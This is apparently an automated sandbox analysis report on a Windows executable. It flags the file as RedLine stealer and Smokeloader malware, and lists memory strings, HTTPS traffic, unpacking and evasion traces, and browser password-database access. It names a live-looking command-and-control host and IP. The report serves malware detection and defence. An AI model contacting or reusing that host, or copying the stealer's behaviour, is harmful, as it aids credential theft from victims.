          Source: LwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: LwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8z
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/9
          Source: LwnI84BBtb.exe, 00000000.00000003.1752757738.0000000004202000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1752899869.0000000004208000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921974910.0000000004209000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921955636.0000000004204000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1752809021.0000000001B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop/api
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1752809021.0000000001B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strollheavengwu.shop:443/api
          Source: LwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: LwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: LwnI84BBtb.exe, 00000000.00000003.1684895328.000000000425C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: LwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: LwnI84BBtb.exe, 00000000.00000003.1703633835.0000000004523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0042D8F0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042D8F0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0042D8F0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042D8F0

          System Summary

          barindex
          Source: 00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004213700_2_00421370
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004046D00_2_004046D0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00420C420_2_00420C42
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004060300_2_00406030
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004210900_2_00421090
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004260970_2_00426097
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004101400_2_00410140
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004261480_2_00426148
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004261C30_2_004261C3
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004261D50_2_004261D5
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004034920_2_00403492
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004055670_2_00405567
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004365C00_2_004365C0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004065F00_2_004065F0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004036700_2_00403670
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0043B6A00_2_0043B6A0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0040581F0_2_0040581F
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004339500_2_00433950
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0043B9D00_2_0043B9D0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004069B40_2_004069B4
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00405B180_2_00405B18
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0041DB220_2_0041DB22
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00407C700_2_00407C70
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00403CEF0_2_00403CEF
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00402EC00_2_00402EC0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036603A70_2_036603A7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036763AF0_2_036763AF
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036762FE0_2_036762FE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036562970_2_03656297
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036531270_2_03653127
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036535170_2_03653517
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036715D70_2_036715D7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036555DB0_2_036555DB
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0367642A0_2_0367642A
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0367643C0_2_0367643C
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_03683BB70_2_03683BB7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036549370_2_03654937
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0368B9070_2_0368B907
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_036868270_2_03686827
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_03653F470_2_03653F47
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_03657ED70_2_03657ED7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0368BC370_2_0368BC37
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: String function: 03660547 appears 188 times
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: String function: 03658957 appears 34 times
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: String function: 004102E0 appears 188 times
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: String function: 004086F0 appears 34 times
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1568
          Source: LwnI84BBtb.exe, 00000000.00000000.1666013473.0000000001A15000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFires0 vs LwnI84BBtb.exe
          Source: LwnI84BBtb.exeBinary or memory string: OriginalFilenameFires0 vs LwnI84BBtb.exe
          Source: LwnI84BBtb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@1/1
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_01A4F5C6 CreateToolhelp32Snapshot,Module32First,0_2_01A4F5C6
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004286B8 CoCreateInstance,0_2_004286B8
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7396
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\9d6a163d-6412-426b-809c-83f29487275eJump to behavior
          Source: LwnI84BBtb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: LwnI84BBtb.exe, 00000000.00000003.1685067804.0000000004234000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: LwnI84BBtb.exeVirustotal: Detection: 40%
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile read: C:\Users\user\Desktop\LwnI84BBtb.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\LwnI84BBtb.exe "C:\Users\user\Desktop\LwnI84BBtb.exe"
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1568
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1644
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: msvcr100.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: LwnI84BBtb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\cekimif35 yanofegec\62\pus.pdb source: LwnI84BBtb.exe
          Source: Binary string: [C:\cekimif35 yanofegec\62\pus.pdb source: LwnI84BBtb.exe

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeUnpacked PE file: 0.2.LwnI84BBtb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeUnpacked PE file: 0.2.LwnI84BBtb.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_01A550F0 push esi; retf 0_2_01A550F4
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_01A550DB push es; iretd 0_2_01A550ED
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
